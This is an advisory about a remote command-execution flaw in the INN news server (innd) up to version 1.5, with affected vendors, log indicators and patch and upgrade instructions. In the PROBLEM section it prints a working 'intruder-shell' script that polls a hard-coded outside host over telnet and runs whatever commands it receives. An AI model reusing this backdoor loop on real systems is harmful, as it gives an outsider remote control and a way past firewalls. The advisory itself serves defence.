COMMAND
InterNetNews server (innd)
SYSTEMS AFFECTED
Systems running InterNetNews server - up to v1.5 including that.
Systems using any of the listed vendors may be vulnerable.
Berkeley Software Design, Inc. (BSDI)
Caldera
Debian Linux
NEC Corporation
Netscape
Red Hat
NOTE: 1.5.1 could be vulnerable - see solutions
PROBLEM
Rikhardur Egilsson posted the "intruder-shell" program.
The "intruder-shell" is the following /bin/sh program:
while :; do
IN=`/bin/sleep 2 | /bin/telnet 193.12.106.100 23 2>/dev/null | /bin/tail -1`
if [ X"$IN" != X"$OIN" ]; then
(/bin/sleep 2; eval "$IN" 2>&1) |
/bin/telnet 193.12.106.100 23 >/dev/null 2>&1
OIN=$IN
fi
sleep 30
done
No exlanation here (look down to understand above), but be aware
of IP you use.
repeat(forever)
wait 2 seconds;
connect to port 23 on 193.12.106.100;
put the last line of what '193.12.106.100' gives us in variable $IN
if $IN does not equal $OIN (Old IN)
wait 2 seconds;
evaluate $IN as a command and send the results to '193.12.106.100'
(f.ex. $IN could be '/bin/ls -l /etc' )
assign the value of $IN to $OIN
end // if
wait 30 seconds
end // repeat
The port '23' is by no means a 'randomly choosed port'. It is
choosed, because, even if most ports to/from a site are blocked
with a router/firewall, port 23 is very often allowed to connect
to the outside world. Port 23 is the 'telnet' port. i.e. if a
domain allows telnet connections out from it's news-server we're
in luck ! Note that port 80 is also good idea.
SOLUTION
Upgrade to INN 1.5.1. Until you can do so, install the patches
available from James Brister or get help from your vendor, if it
is available.
If you do a 'make update' from a previous innd (eg innd1.4unoff4)
to upgrade to 1.5.1 you will still have your old parsecontrol
script. The exploit will still work. The temporary fix is to
copy over the new parsecontrol. The real fix is a newinstall of
1.5.1 with the conf files, lib's, etc pushed on top.
Examine your news logs for signs of exploitation. So far, we have
reports of at least six distinct message IDs being used:
830201540.9120@uunet.uu.net
830201540.9122@uunet.uu.net
830201540.9220@uunet.uu.net
830201540.9223@uunet.uu.net
830201540.9020@uunet.uu.net
830201540.9221@uunet.uu.net
Although these messages appear to come from UUNET, the messages
were forged.
It is recommend running 1.5.1, but if you're running a pre-1.5.1
version of INN, then please go look at web page:
http://www.isc.org/inn.html
or the ftp site
ftp://ftp.isc.org/isc/inn/patches
for patches to 1.4sec, 1.4unoff3, 1.4unoff4 and 1.5 to correct
this.
If you upgraded previously, you must apply new patch to protect
against the new vulnerability (see innd #4 on this page). Until
you can upgrade, you need to apply two patches (see below). You
If you do not upgrade to 1.5.1, apply a patch for the version you
are running and then apply the newly released patch that
addresses the second vulnerability discussed in this advisory. If
you are running INN 1.4sec2, you should upgrade to 1.5.1 as no
patches are available.
FIRST apply:
version patch
------- -----
1.5 ftp://ftp.isc.org/isc/inn/patches/security-patch.01
1.4sec ftp://ftp.isc.org/isc/inn/patches/security-patch.02
1.4unoff3, 1.4unoff4 ftp://ftp.isc.org/isc/inn/patches/security-patch.03
THEN apply (1.5.1, 1.5, 1.4sec, 1.4unoff3, 1.4unoff4)
ftp://ftp.isc.org:/isc/inn/patches/security-patch.04
Some additional patches:
Berkeley Software Design, Inc. (BSDI)
BSDI ship INN as part of our distribution. BSD/OS 2.1 includes INN
1.4sec and 2.1 users should apply the patch referenced here.
BSD/OS 3.0 includes INN 1.4unoff4 and the patch for that version
is already included so BSD/OS 3.0 is not vulnerable as
distributed.
An upgrade package for Caldera OpenLinux Base 1.0 will appear at
Caldera's site:
ftp://ftp.caldera.com/pub/col-1.0/updates/Helsinki/004/inn-1.5.1-2.i386.
rpm
The current version of INN shipped with Debian is 1.4unoff4.
However the "unstable" (or development) tree contains inn-1.5.1.
It can be gotten from any debian mirror in the subdirectory
debian/unstable/binary/news
There is a critical security hole in INN which affects all
versions of Red Hat Linux. A new version, inn-1.5.1-6, is now
available for Red Hat Linux 4.0 and 4.1 for all platforms. If you
are running an earlier version of Red Hat, we strongly encourage
you to upgrade to 4.1 as soon as possible, as many critical
security fixes have been made. The new version of inn is PGP
signed with the Red Hat PGP key, which is available on all Red
Hat CDROMs, ftp.redhat.com, and public keyservers.
You may upgrade to the new version as follows:
Red Hat 4.1
-----------
i386:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/i386/inn-1.5.1-6.i386.rpm
alpha:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/alpha/inn-1.5.1-6.alpha.rpm
SPARC:
rpm -Uvh ftp://ftp.redhat.com/updates/4.1/sparc/inn-1.5.1-6.sparc.rpm
Red Hat 4.0
-----------
i386:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/i386/inn-1.5.1-6.i386.rpm
alpha:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/alpha/inn-1.5.1-6.alpha.rpm
SPARC:
rpm -Uvh ftp://ftp.redhat.com/updates/4.0/sparc/inn-1..5.1-6.sparc.rpm
NEC Corporation
Products below are shipped with INN mentioned here, so they are
vulnerable and patches are in progress.
Goah/NetworkSV R1.2 vulnerable
Goah/NetworkSV R2.2 vulnerable
Goah/NetworkSV R3.1 vulnerable
Goah/IntraSV R1.1 vulnerable
Netscape
The Netscape News Server 2.01 is immune to the attack outlined
here. The News Server 1.1 is, however, subject to the same
vulnerability as INN and Netscape has advised customers to
install the patch described in the advisory CERT (this one).
After installing any of the patches or updates, ensure that you
restart your INN server.